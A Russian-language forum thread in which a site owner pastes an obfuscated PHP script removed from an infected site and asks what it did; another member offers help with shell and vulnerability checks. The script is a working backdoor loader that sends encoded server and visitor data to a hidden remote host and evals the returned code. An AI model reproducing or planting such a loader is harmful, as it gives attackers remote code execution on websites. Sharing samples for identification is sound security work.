# Форум на русском языке  > Лечение и защита сайтов от вирусов  >  Сайт заражён скриптом.

## alex2177

Сайт был заражён скриптом. Удалил AI-BOLITом.  Что делал этот вредоносный PHP скрипт ?

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".bas  e64_encode($c).".".base64_encode($d).".".base64_en  code($e).".".base64_encode($f).".".base64_encode($  g).".".base64_encode($h).".e.".base64_encode($i)."  .".base64_encode($j);$f=base64_decode("cGhwdGFncy5  3cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="8dca1392190c3ef23e45c7a9b5bf342f") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLz  dhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzc  u").$f.$z))eval($c);else{$cu=curl_init(base64_deco  de("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURL  OPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close  ($cu);eval($o);};die(); ?>

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Aleksandra

Нужно провести комплексный анализ сайта на наличие шеллов и уязвимостей. Отпишитесь если требуется помощь.

----------

